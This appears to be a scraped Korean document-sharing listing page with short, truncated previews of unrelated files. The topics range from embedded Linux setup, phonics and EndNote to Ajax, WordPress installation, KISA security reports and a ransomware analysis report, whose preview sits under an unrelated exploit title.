PowerPoint 프레젠테이션 (Host) set up : Linux Backend RS-232, Ethernet, parallel(jtag) Host terminal Target terminal : monitor (Minicom) JTAG Cross compiler Boot loader Pentium Redhat 9.0 Serial port Serial cross cable Ethernet

More information

Stage 2 First Phonics

Stage 2 First Phonics ORT Stage 2 First Phonics The Big Egg What could the big egg be? What are the characters doing? What do you think the story will be about? (큰 달걀은 무엇일까요? 등장인물들은 지금 무엇을 하고 있는 걸까요? 책은 어떤 내용일 것 같나요?) 대해 칭찬해

More information

EndNote X2 초급 분당차병원도서실사서최근영 ( )

EndNote X2 초급 분당차병원도서실사서최근영 ( ) EndNote X2 초급 2008. 9. 25. 사서최근영 (031-780-5040) EndNote Thomson ISI Research Soft의 bibliographic management Software 2008년 9월현재 X2 Version 사용 참고문헌 (Reference), Image, Fulltext File 등 DB 구축 참고문헌 (Reference),

More information

C H A P T E R 2

C H A P T E R 2 C H A P T E R 2 Foundations of Ajax Chapter 2 1 32 var xmlhttp; function createxmlhttprequest() { if(window.activexobject) { xmlhttp = new ActiveXObject( Micr else if(window.xmlhttprequest) { xmlhttp =

More information

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서

커알못의 커널 탐방기 이 세상의 모든 커알못을 위해서 커알못의 커널 탐방기 2015.12 이 세상의 모든 커알못을 위해서 개정 이력 버전/릴리스 0.1 작성일자 2015년 11월 30일 개요 최초 작성 0.2 2015년 12월 1일 보고서 구성 순서 변경 0.3 2015년 12월 3일 오탈자 수정 및 글자 교정 1.0 2015년 12월 7일 내용 추가 1.1 2015년 12월 10일 POC 코드 삽입 및 코드

More information

*****

***** Korea Internet & Security Agency 21 2 본 보고서 내용의 전부나 일부를 인용하는 경우에는 반드시 출처 [자료:한국인터넷진흥원 인터넷침해대응센터]를 명시하여 주시기 바랍니다. CONTENTS 1 2 2 2 3 3 4 5 5 6 6 7 9 1 12 12 13 13 14 16 18 2 21 22 22 34 37 38 1 212 Bot

More information

°í¼®ÁÖ Ãâ·Â

°í¼®ÁÖ Ãâ·Â Performance Optimization of SCTP in Wireless Internet Environments The existing works on Stream Control Transmission Protocol (SCTP) was focused on the fixed network environment. However, the number of

More information

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인

본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인 스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게

More information

ARMBOOT 1

ARMBOOT 1 100% 2003222 : : : () PGPnet 1 (Sniffer) 1, 2,,, (Sniffer), (Sniffer),, (Expert) 3, (Dashboard), (Host Table), (Matrix), (ART, Application Response Time), (History), (Protocol Distribution), 1 (Select

More information

Assign an IP Address and Access the Video Stream - Installation Guide

Assign an IP Address and Access the Video Stream - Installation Guide 설치 안내서 IP 주소 할당 및 비디오 스트림에 액세스 책임 본 문서는 최대한 주의를 기울여 작성되었습니다. 잘못되거나 누락된 정보가 있는 경우 엑시스 지사로 알려 주시기 바랍니다. Axis Communications AB는 기술적 또는 인쇄상의 오류에 대해 책 임을 지지 않으며 사전 통지 없이 제품 및 설명서를 변경할 수 있습니다. Axis Communications

More information

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù

ÀÎÅÍ³Ý ÁøÈï¿ø 5¿ù 21 5 Korea Internet & Security Agency CONTENTS 2 3 3 3 4 4 5 6 6 7 7 8 11 12 14 14 15 15 16 18 2 22 23 24 24 32 35 36 2 215 Bot 1,7511,315 33.2% 1,621,468 27.7% 285 431 33.9% 295 12 6.9% 44 396 2.% 132

More information

PowerPoint Template

PowerPoint Template JavaScript 회원정보 입력양식만들기 HTML & JavaScript Contents 1. Form 객체 2. 일반적인입력양식 3. 선택입력양식 4. 회원정보입력양식만들기 2 Form 객체 Form 객체 입력양식의틀이되는 태그에접근할수있도록지원 Document 객체의하위에위치 속성들은모두 태그의속성들의정보에관련된것

More information

Page 2 of 6 Here are the rules for conjugating Whether (or not) and If when using a Descriptive Verb. The only difference here from Action Verbs is wh

Page 2 of 6 Here are the rules for conjugating Whether (or not) and If when using a Descriptive Verb. The only difference here from Action Verbs is wh Page 1 of 6 Learn Korean Ep. 13: Whether (or not) and If Let s go over how to say Whether and If. An example in English would be I don t know whether he ll be there, or I don t know if he ll be there.

More information

ActFax 4.31 Local Privilege Escalation Exploit

ActFax 4.31 Local Privilege Escalation Exploit NSHC 2013. 05. 23 악성코드 분석 보고서 [ Ransomware 악성코드 ] 사용자의 컴퓨터를 강제로 잠그고 돈을 요구하는 형태의 공격이 기승을 부리고 있 습니다. 이러한 형태의 공격에 이용되는 악성코드는 Ransomware로 불리는 악성코 드 입니다. 한번 감염 시 치료절차가 복잡하며, 보고서 작성 시점을 기준으로 지속 적인 피해자가 발생되고

More information

로거 자료실

로거 자료실 redirection 매뉴얼 ( 개발자용 ) V1.5 Copyright 2002-2014 BizSpring Inc. All Rights Reserved. 본문서에대한저작권은 비즈스프링 에있습니다. - 1 - 목차 01 HTTP 표준 redirect 사용... 3 1.1 HTTP 표준 redirect 예시... 3 1.2 redirect 현상이여러번일어날경우예시...

More information

PowerPoint Presentation

PowerPoint Presentation FORENSIC INSIGHT; DIGITAL FORENSICS COMMUNITY IN KOREA SQL Server Forensic AhnLab A-FIRST Rea10ne unused6@gmail.com Choi Jinwon Contents 1. SQL Server Forensic 2. SQL Server Artifacts 3. Database Files

More information

Week13

Week13 Week 13 Social Data Mining 02 Joonhwan Lee human-computer interaction + design lab. Crawling Twitter Data OAuth Crawling Data using OpenAPI Advanced Web Crawling 1. Crawling Twitter Data Twitter API API

More information

uFOCS

uFOCS 1 기 : 기 UF_D_V250_002 기 기 기 품 ufocs 기 v2.5.0 히기기기기기기기기기 기 Manual 기 version 기 3.2 기품 2011.7.29 히기 345-13 1 Tel : 02-857-3051 Fax : 02-3142-0319 : http://www.satu.co.kr 2010 SAT information Co., Ltd. All

More information

step 1-1

step 1-1 Written by Dr. In Ku Kim-Marshall STEP BY STEP Korean 1 through 15 Action Verbs Table of Contents Unit 1 The Korean Alphabet, hangeul Unit 2 Korean Sentences with 15 Action Verbs Introduction Review Exercises

More information

Microsoft PowerPoint - ch02_인터넷 이해와 활용.ppt

Microsoft PowerPoint - ch02_인터넷 이해와 활용.ppt 컴퓨터 활용과 실습 원리를 알면 IT가 맛있다 chapter 2. 윈도우XP, 한글25, 엑셀23, 파워포인트23 인터넷 이해와 활용 www.hanb.co.kr -1- 학습목표 목차 통신과 네트워크의 개념 통신과 네트워크 컴퓨터 통신망 인터넷정의및역사 인터넷주소체계 인터넷 정의와 역사 인터넷 주소 웹서비스의정의및특징 웹 서비스 웹 브라우저의 기능 웹 브라우저

More information

네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간 약 4천여 고객 사이트에 구축 운영되면서 기술의 안정성과 성능면에서 철저한 시장 검증을 거쳤습니다. 또한 TrusGuard는 단독 기능 또는 복합 기능 구동 시

네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간 약 4천여 고객 사이트에 구축 운영되면서 기술의 안정성과 성능면에서 철저한 시장 검증을 거쳤습니다. 또한 TrusGuard는 단독 기능 또는 복합 기능 구동 시 네트워크 보안도 안철수연구소입니다 통합 보안의 No.1 파트너, AhnLab TrusGuard 네트워크 환경을 수호하는 최고의 통합 보안 시스템 고성능 방화벽ㆍVPN Security 기술과 고품질 Integrated Security 기술의 강력한 결합 네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간

More information

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :

HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,

More information

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로

컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는 우수한 인력을 양성 함과 동시에 직업적 도덕적 책임의식을 갖는 IT인 육성을 교육목표로 한다. 1. 전공 기본 지식을 체계적으로 2015년 상명대학교 ICT융합대학 컴퓨터과학과 졸업 프로젝트 전시회 2015 Computer Science Graduate Exhibition 2015 Computer Science Graduate Exhibition 1 컴퓨터과학과 교육목표 컴퓨터과학과의 컴퓨터과학 프로그램은 해당분야 에서 학문적 기술을 창의적으로 연구하고 산업적 기술을 주도적으로 개발하는

More information

1. GigE Camera Interface를 위한 최소 PC 사양 CPU : Intel Core 2 Duo, 2.4GHz이상 RAM : 2GB 이상 LANcard : Intel PRO/1000xT 이상 VGA : PCI x 16, VRAM DDR2 RAM 256MB

1. GigE Camera Interface를 위한 최소 PC 사양 CPU : Intel Core 2 Duo, 2.4GHz이상 RAM : 2GB 이상 LANcard : Intel PRO/1000xT 이상 VGA : PCI x 16, VRAM DDR2 RAM 256MB Revision 1.0 Date 11th Nov. 2013 Description Established. Page Page 1 of 9 1. GigE Camera Interface를 위한 최소 PC 사양 CPU : Intel Core 2 Duo, 2.4GHz이상 RAM : 2GB 이상 LANcard : Intel PRO/1000xT 이상 VGA : PCI x

More information